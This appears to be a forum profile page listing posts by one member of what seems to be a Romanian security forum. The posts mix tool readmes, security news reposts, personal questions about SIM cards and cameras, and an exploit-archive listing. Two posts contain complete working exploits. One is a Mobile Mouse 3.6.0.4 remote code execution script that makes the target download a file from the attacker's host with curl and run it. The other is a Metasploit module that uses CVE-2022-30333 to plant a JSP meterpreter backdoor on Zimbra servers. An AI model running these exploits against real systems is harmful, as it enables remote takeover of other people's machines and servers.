Jump to content

Kev

Active Members
  • Posts

    1026
  • Joined

  • Days Won

    55

Everything posted by Kev

  1. Tracee is a Runtime Security and forensics tool for Linux. It uses Linux eBPF technology to trace your system and applications at runtime, and analyzes collected events in order to detect suspicious behavioral patterns. It is usually delivered as a docker container, but there are other ways you can use it (even create your own customized tracee container). Watch a quick video demo of Tracee: Check out the Tracee video hub for more videos. Documentation The full documentation of Tracee is available at https://aquasecurity.github.io/tracee/dev. You can use the version selector on top to view documentation for a specific version of Tracee. Quickstart Before you proceed, make sure you follow the minimum requirements for running Tracee. 1. Running tracee:latest docker run \ --name tracee --rm -it \ --pid=host --cgroupns=host --privileged \ -v /etc/os-release:/etc/os-release-host:ro \ -e LIBBPFGO_OSRELEASE_FILE=/etc/os-release-host \ aquasec/tracee:latest 2. Running tracee:full docker run --name tracee --rm -it \ --pid=host --cgroupns=host --privileged \ -v /etc/os-release:/etc/os-release-host:ro \ -e LIBBPFGO_OSRELEASE_FILE=/etc/os-release-host \ -v /usr/src:/usr/src:ro \ -v /lib/modules:/lib/modules:ro \ -v /tmp/tracee:/tmp/tracee:rw \ aquasec/tracee:full The default (latest) image is lightweight and portable. It is supposed to support different kernel versions without having to build source code. If the host kernel does not support BTF then you may use the full container image. The full container will compile an eBPF object during startup, if you do not have one already cached in /tmp/tracee. You may need to change the volume mounts for the kernel headers based on your setup. See Linux Headers section for more info. Tracee supports enriching events with additional data from running containers. In order to enable this capability please look here. These docker commands run Tracee with default settings and start reporting detections to standard output. In order to simulate a suspicious behavior, you can simply run: strace ls in another terminal. This will trigger the Anti-Debugging signature, which is loaded by default, and you will get a warning: INFO: probing tracee-ebpf capabilities... INFO: starting tracee-ebpf... INFO: starting tracee-rules... Loaded 14 signature(s): [TRC-1 TRC-13 TRC-2 TRC-14 TRC-3 TRC-11 TRC-9 TRC-4 TRC-5 TRC-12 TRC-8 TRC-6 TRC-10 TRC-7] Serving metrics endpoint at :3366 Serving metrics endpoint at :4466 *** Detection *** Time: 2022-03-25T08:04:22Z Signature ID: TRC-2 Signature: Anti-Debugging Data: map[] Command: strace Hostname: ubuntu-impish Trace In some cases, you might want to leverage Tracee's eBPF event collection capabilities directly, without involving the detection engine. This might be useful for debugging, troubleshooting, analysing, researching OR education. Execute docker container with the word trace as an initial argument, and tracee-ebpf will be executed, instead of the full tracee detection engine. docker run \ --name tracee --rm -it \ --pid=host --cgroupns=host --privileged \ -v /etc/os-release:/etc/os-release-host:ro \ -e LIBBPFGO_OSRELEASE_FILE=/etc/os-release-host \ aquasec/tracee:latest \ trace Components Tracee is composed of the following sub-projects, which are hosted in the aquasecurity/tracee repository: Tracee-eBPF - Linux Tracing and Forensics using eBPF Tracee-Rules - Runtime Security Detection Engine Tracee is an Aqua Security open source project. Learn about our open source work and portfolio Here. Join the community, and talk to us about any matter in GitHub Discussion or Slack. Download: tracee-main.zip or git clone https://github.com/aquasecurity/tracee.git Source
  2. This archive contains all of the 118 exploits added to Packet Storm in September, 2022. Content: Directory of \202209-exploits\2209-exploits 10/03/2022 02:30 AM <DIR> . 10/03/2022 02:30 AM <DIR> .. 09/26/2022 06:21 PM 2,414 activeecomcms630-disclose.txt 09/26/2022 06:22 PM 1,997 activeecomcms630-xss.txt 09/09/2022 06:54 PM 560 airdisk755-xss.txt 09/13/2022 06:37 PM 1,679 alms57-shell.txt 09/08/2022 05:47 PM 4,663 apache_spark_rce_cve_2022_33891.rb.txt 09/09/2022 06:48 PM 976 atdrive28-lfi.txt 09/09/2022 07:02 PM 1,836 avevaitaasg-traversal.txt 09/26/2022 06:39 PM 17,852 beagent_sha_auth_rce.rb.txt 09/22/2022 07:01 PM 8,319 bitbucket_git_cmd_injection.rb.txt 09/20/2022 05:03 PM 2,374 blink1control2227-insecure.txt 09/20/2022 04:52 PM 840 bookwyrm043-bypass.txt 09/26/2022 06:26 PM 6,255 brw131-xss.txt 09/20/2022 04:57 PM 2,835 buffalotsnas166-bypass.txt 09/29/2022 06:11 PM 2,338 buspms10-xss.txt 09/05/2022 06:17 PM 6,438 cisco_asax_sfr_rce.rb.txt 09/23/2022 05:08 PM 3,009 feehicms211-exec.txt 09/07/2022 08:06 PM 1,083 fefileexplorer1104-lfi.txt 09/27/2022 06:42 PM 2,003 foms10-sql.txt 09/07/2022 07:50 PM 6,781 ftpmanager82-lfitraversal.txt 09/19/2022 05:52 PM 1,387 genesyspureconnect-xss.txt 09/15/2022 05:01 PM 9,013 gitea1166-exec.rb.txt 09/09/2022 06:35 PM 5,328 GS20220909153445.tgz 09/09/2022 06:38 PM 4,460 GS20220909153743.tgz 09/09/2022 06:41 PM 6,293 GS20220909154008.tgz 09/09/2022 06:43 PM 14,914 GS20220909154254.tgz 09/09/2022 06:45 PM 8,544 GS20220909154511.tgz 09/09/2022 06:50 PM 13,201 GS20220909154932.tgz 09/09/2022 06:52 PM 14,092 GS20220909155201.tgz 09/09/2022 06:58 PM 13,135 GS20220909155726.tgz 09/09/2022 07:00 PM 19,227 GS20220909155928.tgz 09/09/2022 07:06 PM 14,832 GS20220909160551.tgz 09/09/2022 07:10 PM 4,120 GS20220909160817.tgz 09/16/2022 04:40 PM 4,699 GS20220916134029.tgz 09/20/2022 05:07 PM 4,312 GS20220920140731.tgz 09/20/2022 05:12 PM 4,275 GS20220920141211.tgz 09/20/2022 05:15 PM 9,631 GS20220920141404.tgz 09/20/2022 05:19 PM 4,955 GS20220920141716.tgz 09/22/2022 06:56 PM 9,880 GS20220922155445.tgz 09/12/2022 06:47 PM 5,800 infixlms430-inject.txt 09/12/2022 06:48 PM 4,613 infixlms430-shell.txt 09/29/2022 06:12 PM 6,307 joomlaadsmanager320-sql.txt 09/30/2022 05:55 PM 5,944 joomladjclassifiedsads39-xss.txt 09/29/2022 05:55 PM 5,356 joomlaedocman1233-xss.txt 09/28/2022 06:03 PM 5,261 joomlaeshopsc360-xss.txt 09/30/2022 05:52 PM 5,447 joomlajoomrecipe422-xss.txt 09/26/2022 06:19 PM 5,430 livelycartpro3-xss.txt 09/09/2022 06:55 PM 421 mbdrivelitewfd140-xss.txt 09/05/2022 06:03 PM 1,802 mobilemouse3604-exec.txt 09/28/2022 06:11 PM 6,116 mobile_mouse_rce.rb.txt 09/22/2022 06:45 PM 1,615 multix24-xsrf.txt 09/22/2022 06:45 PM 2,084 multix24-xss.txt 09/07/2022 07:52 PM 1,986 MVID-2022-0633.txt 09/07/2022 07:53 PM 2,151 MVID-2022-0634.txt 09/07/2022 07:57 PM 2,007 MVID-2022-0635.txt 09/07/2022 08:15 PM 3,001 MVID-2022-0636.txt 09/07/2022 07:41 PM 2,665 MVID-2022-0637.txt 09/07/2022 08:07 PM 3,754 MVID-2022-0638.txt 09/20/2022 04:50 PM 1,648 MVID-2022-0639.txt 09/20/2022 04:53 PM 2,847 MVID-2022-0640.txt 09/20/2022 05:05 PM 1,806 MVID-2022-0641.txt 09/20/2022 05:04 PM 2,430 MVID-2022-0642.txt 09/26/2022 06:24 PM 3,850 MVID-2022-0643.txt 09/26/2022 06:38 PM 2,149 MVID-2022-0644.txt 09/26/2022 06:25 PM 1,915 MVID-2022-0645.txt 09/05/2022 05:59 PM 25,764 naval.py.txt 09/28/2022 06:07 PM 8,110 netfilter_nft_set_elem_init_privesc.rb.txt 09/15/2022 05:16 PM 1,037 news247nm10-xss.txt 09/27/2022 06:46 PM 866 obcms10-idor.txt 09/27/2022 06:44 PM 1,120 obcms10-xsrf.txt 09/27/2022 06:52 PM 972 obcms10-xss.txt 09/27/2022 06:49 PM 817 obcms10persistent-xss.txt 09/26/2022 06:30 PM 2,630 odlms10-sqlbypassshell.txt 09/06/2022 07:16 PM 2,364 oelms10-xsrf.txt 09/29/2022 05:57 PM 898 oes10-sql.txt 09/29/2022 05:45 PM 743 oes10-xss.txt 09/05/2022 06:05 PM 2,547 omps10-sql.txt 09/05/2022 06:07 PM 1,084 omps10-xss.txt 09/09/2022 06:56 PM 2,025 onb2022-sql.txt 09/19/2022 05:58 PM 2,128 opencart3xncp-sql.txt 09/30/2022 05:54 PM 5,352 opencartjcart30319-xss.txt 09/26/2022 06:18 PM 5,449 oscommercesc4-xss.txt 09/19/2022 06:00 PM 3,627 owlfilesfm1201-traversal.txt 09/16/2022 04:57 PM 5,457 panos_op_cmd_exec.rb.txt 09/26/2022 06:15 PM 2,243 pfBlockerNG-RCE.py.txt 09/19/2022 06:02 PM 3,698 photosync47-lfi.txt 09/20/2022 04:59 PM 11,362 Processmaker-PoC-by-Sornram9254.py.txt 09/29/2022 06:16 PM 9,061 qdpm_authenticated_rce.rb.txt 09/13/2022 06:39 PM 6,915 rocketlms16-shell.txt 09/16/2022 04:45 PM 21,866 rocketlms16-sql.txt 09/13/2022 06:38 PM 1,824 rocketlms16-xss.txt 09/16/2022 04:52 PM 11,376 SA-20220914-0.txt 09/16/2022 05:01 PM 10,883 SA-20220915-0.txt 09/27/2022 06:54 PM 13,634 SA-20220923-0.txt 09/09/2022 06:16 PM 1,367 sacco2022-sql.txt 09/09/2022 07:16 PM 852 sagemath90-dosoverflow.txt 09/12/2022 06:45 PM 1,375 smartrg2613-exec.txt 09/16/2022 04:47 PM 1,507 ssb223-sql.txt 09/13/2022 06:52 PM 7,926 SYSS-2022-041.txt 09/23/2022 05:09 PM 617 teleport1011-exec.txt 09/23/2022 05:06 PM 687 testa351-xss.txt 09/23/2022 05:03 PM 1,219 tplinktapoc2001115-exec.txt 09/21/2022 04:50 PM 22,438 unified_remote_rce.rb.txt 09/19/2022 09:25 PM 2,380 viaviwebwallpaper-sqlshell.txt 09/06/2022 07:17 PM 1,147 wifihdwdd11-lfi.txt 09/21/2022 04:45 PM 1,127 wifimouse1834-exec.txt 09/26/2022 06:41 PM 3,264 wifi_mouse_rce.rb.txt 09/22/2022 06:52 PM 1,827 workordercms010-sql.txt 09/22/2022 06:53 PM 426 workordercms010-xss.txt 09/23/2022 05:16 PM 1,254 wp3dadyrtws10-xss.txt 09/26/2022 06:36 PM 5,119 wpforym157-xss.txt 09/14/2022 06:04 PM 3,438 wpgateway35-escalate.txt 09/19/2022 05:55 PM 701 wpgetyourguideticketing101-xss.txt 09/28/2022 06:01 PM 715 wpmotopresshbl442-xss.txt 09/02/2022 06:19 PM 1,342 wpnetroicsblogpostsgrid10-xss.txt 09/26/2022 06:32 PM 5,762 wpsabaidiscuss1413-xss.txt 09/23/2022 05:14 PM 1,631 wpuseronline2880-xss.txt 09/12/2022 06:54 PM 1,965 ZSL-2022-5711.txt 09/19/2022 06:03 PM 65,921 ZSL-2022-5712.tgz 119 File(s) 630,814 bytes Total Files Listed: 118 File(s) Download: 202209-exploits.tgz (351 KB) Source
  3. Dude, nu-mi place sa folosesc cuvantul "clonez", doar vreau sa am doua cartele cu acelasi numar, sa nu functioneze simultan, unul pentru acasa iar al II-lea pentru serviciu
  4. Nu dude, poate sunt mecanic auto, sau lucrez pe sentier, sa nu sparg Android-ul, si, nu pot face redirect pe acelasi numar, cartelele sunt vechi, expirate, nu pot fi reactivate si, face redirectionare pe acelasi numar, scoate cartela, intro in jaf, si invers, am crezut ca poate axista vreo aplicatie pentru Android cu care sa nu functioneze ambele cartele simultan
  5. https://www.imyfone.com/mobile-transfer/how-to-clone-a-sim-card/
  6. Right Edit: nici Quote nu functioneaza pe Opera version is90.0.4480.84
  7. am abonament, sim-ul este mort, e prepay expirat,k nu pot suna nici la 222, *133# nimic, asta vreau sa-l readuc la viata si sa functrioneze simultan
  8. Salut, vreau sa conectez un PC cu 4 porturi USB la un telefon, (remote control), am iOs si monitor asus de 17", vrem sa vizionam un film prin cablu USb, exista o aplicatie? Fara hardware, cablu USB, Yelefon iOS, monitor PC 17" Edit:/ Android Multumesc
  9. Salut, vreau sa plec la vanatoare/pescuit/picnic, nu stiu ce peripetii mai fac pe acolo... Vreau sa "salvez" nr. de telefon (SIM-ul), de pe un iOS (dual SIM) pe SIM vechi (anulat), pentru un a salva nr personal. telefon e.g. Nokia 3310, 5100 etc... Ideea este ca nu vreau sa functioneze simultan, vreau doar cand plec la drumetii sa am un nr. de contact, in caz de urgente, moare porcul, pisica, cainele, iar cel de acasa (personal) sa fie offline. Exista App care sa faca treaba asta? (in caz de ceva ajung acasa si ii dau on pe numarul personal, acelasi numar pe care l-a luat valul. Cu alte cuvinte, ma duc la vanatoare/pescuit/picnic ma impinge un prost in apa si cad cu tot cu tel, sa nu stric iOS-ul, sa am o rabla cu mine cu acelasi nr pe care il am in casa, nu sunt waterproof nici generatiile vechi nici cele noi, primele care sunt afectate sunt SIM-urile (patit). Sper ca ati inteles Thanks
  10. A Microsoft logo sits illuminated at the World Mobile Congress at the Fira Gran Via Complex on Feb. 22, 2016, in Barcelona, Spain. (Photo by David Ramos/Getty Images) Researchers on Tuesday reported that this past August they identified an attack path that lets malicious actors with file system access to steal credentials for any Microsoft Teams user who’s logged-on. In a Sept. 13 blog post, the Vectra Protect team said because attackers do not require elevated permissions to read these files, it exposes this potential concern to any attack that provides malicious actors with local or remote system access. The researchers said this vulnerability impacted all commercial and Government Community Cloud Desktop Team clients for Windows, Mac and Linux. Microsoft has been made aware of this issue and closed the case in late August, stating that it did not meet its bar for immediate servicing. The Vectra researchers said until Microsoft moves to update the Teams Desktop Application, they don’t recommend using the full Teams client and advise customers to consider using the web-based Teams application exclusively. The researchers said security teams should use the web-based Teams client inside Microsoft Edge, which has multiple OS-level controls to protect token leaks. They said the Teams web application is robust and supports most features enabled through the desktop client, keeping the organization’s productivity impacts to a minimum. For customers that must use the installed desktop application, the researchers said it’s critical to watch key application files for access by any processes other than the official Teams application. When asked Thursday if the situation had changed, Aaron Turner, CTO, SaaS Protect at Vectra, said to the Vectra team’s knowledge, Microsoft had not changed its stance. Turner said in Vectra’s interactions with customers, only those organizations with extreme exposure to sophisticated adversaries (defense contractors, critical infrastructure operators) are seriously considering eliminating the Teams.exe application on endpoints and forcing users to collaborate through Teams via a managed browser. Turner said most of the organizations he has talked to plan on implementing an endpoint detection and response monitoring policy to watch for any situations of unauthorized access by a system process to the file storage locations where the tokens are stored. Turner added that the work Vectra’s Connor Peoples spearheaded to discover this vulnerability and coordinate his findings with Microsoft is part of Vectra's efforts to help make the Microsoft 365 ecosystem a safer and fairer place for any organization to communicate and collaborate. As outlined in the research, Turner said there are some improvements that Microsoft can make to shore up the Electron application for Windows and MacOS. He said those improvements should also help prevent future vulnerabilities, such as other recently disclosed problems relating to XSS attacks and potential command and control activity using GIFs. Sammy Migues, principal scientist at Synopsys Software Integrity Group, said like every application framework, Electron has its own idiosyncrasies related to authentication, secure file storage, and communications. Migues said development teams use frameworks for the same reason they use lots of other open source — it makes their jobs easier and faster. On the other hand, even security-aware teams might not understand what’s really going on in the depths of the framework they’re using. Migues said In this case, it appears that Electron might save some sensitive data in an insecure way. Via scmagazine.com/
  11. # Exploit Title: Mobile Mouse 3.6.0.4 Remote Code Execution # Exploit Author: Chokri Hammedi # Vendor Homepage: https://mobilemouse.com/ # Software Link: https://www.mobilemouse.com/downloads/setup.exe # Version: 3.6.0.4 # Tested on: Windows 10 Enterprise LTSC Build 17763 #!/usr/bin/env python3 import socket from time import sleep import argparse help = " Mobile Mouse 3.6.0.4 Remote Code Execution " parser = argparse.ArgumentParser(description=help) parser.add_argument("--target", help="Target IP", required=True) parser.add_argument("--file", help="File name to Upload") parser.add_argument("--lhost", help="Your local IP", default="127.0.0.1") args = parser.parse_args() host = args.target command_shell = args.file lhost = args.lhost port = 9099 # Default Port s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) CONN = bytearray.fromhex("434F4E4E4543541E1E63686F6B7269 68616D6D6564691E6950686F6E651E321E321E04") s.send(CONN) run = s.recv(54) RUN = bytearray.fromhex("4b45591e3131341e721e4f505404") s.send(RUN) run = s.recv(54) sleep(0.5) download_string= f"curl http://{lhost}:8080/{command_shell} -o c:\Windows\Temp\{command_shell}".encode('utf-8') hex_shell = download_string.hex() SHELL = bytearray.fromhex("4B45591E3130301E" + hex_shell + "1E04" + "4b45591e2d311e454e5445521e04") s.send(SHELL) shell = s.recv(96) print ("Executing The Command Shell...") sleep(5) RUN2 = bytearray.fromhex("4b45591e3131341e721e4f505404") s.send(RUN2) run2 = s.recv(54) sleep(0.8) shell_string= f"c:\Windows\Temp\{command_shell}".encode('utf-8') hex_run = shell_string.hex() RUN3 = bytearray.fromhex("4B45591E3130301E" + hex_run + "1E04" + "4b45591e2d311e454e5445521e04") s.send(RUN3) run3 = s.recv(96) print (" Take The Rose") sleep(50) s.close() # 0day.today [2022-09-11] # Source: 0day.today
  12. Parental Control, il pune pe mod avion, ii cumperi un fard in fapt
  13. Umple frigideru, On: din cate stiu se poate da purge spammer % delete
  14. Bun concept, asta in cazul in care nu ai intentii de Supermarket, de nu-mi primesc facturile de gaze. ON: poti face conversie din html, http, csf, ncsf in ce vrei tu cu grep, le importi (cu plata) in smsglobal, (daca ai subscribe) sa fie legit sau, ... revin cu un edit
  15. Another reason not to play 1989's Rhythm Nation – it messes with some hard disk drives The music video for Janet Jackson's 1989 pop hit Rhythm Nation has been recognized as an exploit for a cybersecurity vulnerability after Microsoft reported it can crash old laptop computers. The story detailed how "a major computer manufacturer discovered that playing the music video for Janet Jackson's Rhythm Nation would crash certain models of laptops." Further investigation revealed that multiple manufacturers' machines also crashed. Sometimes playing the video on one laptop would crash another nearby laptop. This is mysterious because the song isn't actually that bad. Investigation revealed that all the crashing laptops shared the same 5400 RPM hard disk drive. The manufacturer that found the problem apparently added a custom filter in the audio pipeline to detect and remove the offending frequencies during audio playback. Few modern machines have hard disk drives, never mind drives that rotate at the unfashionably slow speed of 5400 revolutions per minute. Also, hardly anybody listens to Janet Jackson anymore. The Register nonetheless reports this news because The Mitre Corporation has seen fit to list it on the register of Common Vulnerabilities and Exposures (CVEs) – the definitive list of cybersecurity vulnerabilities we all need to watch out for. It's listed as CVE-2022-38392 and has already been acknowledged by security vendor Tenable. OK, so you've air-gapped that PC. Cut the speakers. Covered the LEDs. Disconnected the monitor. Now, about the data-leaking power supply unit … APIC fail: Intel 'Sunny Cove' chips with SGX spill secrets Real-time deepfakes can be beaten by a sideways glance While the bug seems comical, side-channel attacks are a real threat. Israeli researcher Mordechai Guri has found ways to attack computers including by making memory emit radiation in the same bands used by Wi-Fi and encoding information into those emissions. Owners of laptops with old, slow, hard disks therefore need to be very careful if they hear Janet Jackson tunes while they work – which is why we've not embedded Rhythm Nation in this story. But it does feel safe to remind readers of the weirdest bug The Register has previously encountered: Cisco's alert about cosmic rays crashing some kit. ® Via theregister.com
  16. ( A simple text editor on the web where you can write and compute. ) Alain Marty | last update: 2022/08/15 UR: http://lambdaway.free.fr/lambdawalks/
  17. Similar cu DALL-E 2.0 Midjourney is an independent research lab exploring new mediums of thought and expanding the imaginative powers of the human species. There are two ways to experience the tools: the Midjourney Bot, which you can use to generate images, and the web app at https://www.midjourney.com/app/ , where you can find a gallery of your own work and other users' creations. You can use our Midjourney Bot on our official Discord server (https://discord.gg/midjourney) as well as on any other Discord server where it has been set up. If you wish to invite the bot to your own community, follow the instructions on this page: Use Midjourney on your own Discord Server. URL: https://www.midjourney.com/home/ Primit de la un coleg. Enjoy!
  18. Kev

    Puzzle

    L-am rezolvat si eu, a fost mai dificil, Figure #49 Lasa-mi o adresa in PM cu EGLD (Elrond), BTC are fee-ul mare. P.S. postez rezolvarea pt. Figure #50, am uitat sa inregistrez
  19. Kev

    Puzzle

    Salut, incercãm sa trecem un test puzzle https://figure.game cu IQ peste medie, de fiecare data ramanem blocati la ultima piesã, din 10moves left, ramanem cu una, il rezolva cineva? Are o sticla cu vin in crypto. Edit: 3 mutãri, rãmânem cu o piesa, teasing? P.S. moderatorii in cazul in care am postat gresit si nu in Challenges (CTF) , se poate muta/delete sau Trash. P.S.2. pimul venit, primul servit Enjoy!
  20. Kev

    Camera Mini - Wifi

    Bun, am inteles, este praf, ceva identic de calitate? am intrat in resurse mai am 130 ron (tigari). Fara cabluri, vreau sa o atasez in exterior in coltul usii, fara cabluri, fara ciuruit peretii, etc,,,
  21. Salut, Caut de ceva timp (cateva luni), o mini-viedo camera pentru a supravghea biroul din exterior, Ce am gasit in Facebook ads din intamplare, este: https://oricare.ro/products/camera-wifi-mini Nu vreau sa gauresc peretii, vreau sa o amplasez in exterior. ^ are autonomie de 120 min. am gasit la 69 ron cu autonomie 180 min. Sunt de incredere? Buget maxim 150 RON @Wav3 Ce recomandati? Sigur. Multumesc
  22. socialscan is an accurate command-line tool to check For email and social media username usage on online platforms, given an email address or username, socialscan returns whether it is available, taken or invalid on online platforms. Other similar tools check username availability by requesting the profile page of the username in question and based on information like the HTTP status code or error text on the requested page, determine whether a username is already taken. This is a naive approach that fails in the following cases: Reserved keywords: Most platforms have a set of keywords that they don’t allow to be used in usernames (A simple test: try checking reserved words like ‘admin’ or ‘home’ or ‘root’ and see if other services mark them as available) Deleted/banned accounts: Deleted/banned account usernames tend to be unavailable even though the profile pages might not exist Therefore, these tools tend to come up with false positives and negatives. This method of checking is also dependent on platforms having web-based profile pages and cannot be extended to email addresses. socialscan aims to plug these gaps by directly querying the registration servers of the platforms instead, retrieving the appropriate CSRF tokens, headers, and cookies. Install Socialscan Command-Line Tool To Check For Email And Social Media Username Usage pip > pip install socialscan > git clone https://github.com/iojw/socialscan.git > cd socialscan > pip install . ocialscan Command-Line Tool To Check For Email And Social Media Username Usage usage: socialscan [list of usernames/email addresses to check] optional arguments: -h, --help show this help message and exit --platforms [platform [platform ...]], -p [platform [platform ...]] list of platforms to query (default: all platforms) --view-by {platform,query} view results sorted by platform or by query (default: query) --available-only, -a only print usernames/email addresses that are available and not in use --cache-tokens, -c cache tokens for platforms requiring more than one HTTP request (Snapchat, GitHub, Instagram. Lastfm & Tumblr), reducing total number of requests sent --input input.txt, -i input.txt file containg list of queries to execute --proxy-list proxy_list.txt file containing list of HTTP proxy servers to execute queries with --verbose, -v show query responses as they are received --show-urls display profile URLs for usernames on supported platforms (profiles may not exist if usernames are reserved or belong to deleted/banned accounts) --json json.txt output results in JSON format to the specified file --version show program's version number and exit You can download Socialscan here: socialscan-v1.4.2.zip Or read more here. Sources: darknet.org.uk github.com
  23. This Metasploit module creates a RAR file that can be emailed to a Zimbra server to exploit CVE-2022-30333. If successful, it plants a JSP-based backdoor in the public web directory, then executes that backdoor. The core vulnerability is a path-traversal issue in unRAR that can extract an arbitrary file to an arbitrary location on a Linux system. This issue is exploitable on Zimbra Collaboration versions 9.0.0 Patch 24 and below and 8.8.15 Patch 31 and below provided that UnRAR versions 6.11 or below are installed. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT include Msf::Exploit::EXE include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper include Msf::Exploit::Format::RarSymlinkPathTraversal def initialize(info = {}) super( update_info( info, 'Name' => 'UnRAR Path Traversal in Zimbra (CVE-2022-30333)', 'Description' => %q{ This module creates a RAR file that can be emailed to a Zimbra server to exploit CVE-2022-30333. If successful, it plants a JSP-based backdoor in the public web directory, then executes that backdoor. The core vulnerability is a path-traversal issue in unRAR that can extract an arbitrary file to an arbitrary location on a Linux system. This issue is exploitable on the following versions of Zimbra, provided UnRAR version 6.11 or earlier is installed: * Zimbra Collaboration 9.0.0 Patch 24 (and earlier) * Zimbra Collaboration 8.8.15 Patch 31 (and earlier) }, 'Author' => [ 'Simon Scannell', # Discovery / initial disclosure (via Sonar) 'Ron Bowes', # Analysis, PoC, and module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2022-30333'], ['URL', 'https://blog.sonarsource.com/zimbra-pre-auth-rce-via-unrar-0day/'], ['URL', 'https://github.com/pmachapman/unrar/commit/22b52431a0581ab5d687747b65662f825ec03946'], ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P25'], ['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P32'], ['URL', 'https://attackerkb.com/topics/RCa4EIZdbZ/cve-2022-30333/rapid7-analysis'], ], 'Platform' => 'linux', 'Arch' => [ARCH_X86, ARCH_X64], 'Targets' => [ [ 'Zimbra Collaboration Suite', {} ] ], 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp', 'TARGET_PATH' => '../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/', 'TARGET_FILENAME' => nil, 'DisablePayloadHandler' => false, 'RPORT' => 443, 'SSL' => true }, 'Stance' => Msf::Exploit::Stance::Passive, 'DefaultTarget' => 0, 'Privileged' => false, 'DisclosureDate' => '2022-06-28', 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS] } ) ) register_options( [ OptString.new('FILENAME', [ false, 'The file name.', 'payload.rar']), # Separating the path, filename, and extension allows us to randomize the filename OptString.new('TARGET_PATH', [ true, 'The location the payload should extract to (can, and should, contain path traversal characters - "../../").']), OptString.new('TARGET_FILENAME', [ false, 'The filename to write in the target directory; should have a .jsp extension (default: <random>.jsp).']), ] ) register_advanced_options( [ OptString.new('SYMLINK_FILENAME', [ false, 'The name of the symlink file to use (must be 12 characters or less; default: random)']), OptBool.new('TRIGGER_PAYLOAD', [ false, 'If set, attempt to trigger the payload via an HTTP request.', true ]), # Took this from multi/handler OptInt.new('ListenerTimeout', [ false, 'The maximum number of seconds to wait for new sessions.', 0 ]), OptInt.new('CheckInterval', [ true, 'The number of seconds to wait between each attempt to trigger the payload on the server.', 5 ]) ] ) end # Generate an on-system filename using datastore options def generate_target_filename if datastore['TARGET_FILENAME'] && !datastore['TARGET_FILENAME'].end_with?('.jsp') print_Warning('TARGET_FILENAME does not end with .jsp, was that intentional?') end File.join(datastore['TARGET_PATH'], datastore['TARGET_FILENAME'] || "#{Rex::Text.rand_text_alpha_lower(4..10)}.jsp") end # Normalize the path traversal and figure out where it is relative to the web root def zimbra_get_public_path(target_filename) # Normalize the path normalized_path = Pathname.new(File.join('/opt/zimbra/data/amavisd/tmp', target_filename)).cleanpath # Figure out where it is, relative to the webroot webroot = Pathname.new('/opt/zimbra/jetty_base/webapps/zimbra/') relative_path = normalized_path.relative_path_from(webroot) # Hopefully, we found a path from the webroot to the payload! if relative_path.to_s.start_with?('../') return nil end relative_path end def exploit print_status('Encoding the payload as a .jsp file') payload = Msf::Util::EXE.to_jsp(generate_payload_exe) # Create a file target_filename = generate_target_filename print_status("Target filename: #{target_filename}") begin rar = encode_as_traversal_rar(datastore['SYMLINK_FILENAME'] || Rex::Text.rand_text_alpha_lower(4..12), target_filename, payload) rescue StandardError => e fail_with(Failure::BadConfig, "Failed to encode RAR file: #{e}") end file_create(rar) print_good('File created! Email the file above to any user on the target Zimbra server') # Bail if they don't want the payload triggered return unless datastore['TRIGGER_PAYLOAD'] # Get the public path for triggering the vulnerability, terminate if we # can't figure it out public_filename = zimbra_get_public_path(target_filename) if public_filename.nil? print_warning('Could not determine the public web path, disabling payload triggering') return end register_file_for_cleanup(target_filename) interval = datastore['CheckInterval'].to_i print_status("Trying to trigger the backdoor @ #{public_filename} every #{interval}s [backgrounding]...") # This loop is mostly from `multi/handler` stime = Process.clock_gettime(Process::CLOCK_MONOTONIC).to_i timeout = datastore['ListenerTimeout'].to_i loop do break if session_created? break if timeout > 0 && (stime + timeout < Process.clock_gettime(Process::CLOCK_MONOTONIC).to_i) res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(public_filename) ) unless res fail_with(Failure::Unknown, 'Could not connect to the server to trigger the payload') end Rex::ThreadSafe.sleep(interval) end end end Source
×
×
  • Create New...